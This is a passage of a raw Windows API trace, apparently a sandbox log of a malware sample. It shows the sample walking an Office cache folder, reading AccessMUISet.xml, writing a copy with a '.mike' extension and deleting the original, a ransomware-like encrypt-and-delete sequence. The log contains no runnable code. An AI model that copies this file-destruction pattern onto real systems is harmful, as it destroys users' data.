ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 0 [0041.344] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0041.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0041.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.345] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0041.345] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0041.345] CoTaskMemFree (pv=0x4fe370) [0041.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0041.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0041.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.345] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0041.345] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.389] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.390] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0041.390] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0041.390] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0041.390] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0041.390] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.390] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0041.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", lpFilePart=0x0) returned 0x4f [0041.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.391] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.391] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.392] GetFileType (hFile=0x264) returned 0x1 [0041.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.392] GetFileType (hFile=0x264) returned 0x1 [0041.392] CloseHandle (hObject=0x264) returned 1 [0041.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.392] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.392] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.392] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.393] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2153a68 | out: lpFileInformation=0x2153a68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0041.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.393] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2153dac | out: lpFileInformation=0x2153dac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0041.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.393] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.394] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.394] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.394] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.394] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.394] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.394] GetFileType (hFile=0x264) returned 0x1 [0041.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.394] GetFileType (hFile=0x264) returned 0x1 [0041.394] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.395] WriteFile (in: hFile=0x264, lpBuffer=0x2154d34*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2154d34*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.395] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x21547f4 | out: lpFileInformation=0x21547f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0041.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.396] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.396] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.396] GetFileType (hFile=0x264) returned 0x1 [0041.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.396] GetFileType (hFile=0x264) returned 0x1 [0041.396] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.396] ReadFile (in: hFile=0x264, lpBuffer=0x2155e78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2155e78*, lpNumberOfBytesRead=0x2af110*=0x333, lpOverlapped=0x0) returned 1 [0041.398] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.398] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.398] GetFileType (hFile=0x264) returned 0x1 [0041.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.398] GetFileType (hFile=0x264) returned 0x1 [0041.398] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.398] WriteFile (in: hFile=0x264, lpBuffer=0x215a0a4*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x215a0a4*, lpNumberOfBytesWritten=0x2af104*=0x340, lpOverlapped=0x0) returned 1 [0041.399] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.399] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.399] GetFileType (hFile=0x264) returned 0x1 [0041.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.399] GetFileType (hFile=0x264) returned 0x1 [0041.400] WriteFile (in: hFile=0x264, lpBuffer=0x215d2e8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x215d2e8*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.400] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.400] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.400] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e0bfe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e0bfe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e0bfe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560)) returned 1 [0041.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.400] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.400] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike", lpFilePart=0x0) returned 0x54 [0041.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.400] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x215eac4 | out: lpFileInformation=0x215eac4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e0bfe0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e0bfe0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e0bfe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560)) returned 1 [0041.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.401] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.401] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", dwFileAttributes=0x80) returned 1 [0041.401] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.401] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1 [0041.402] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All 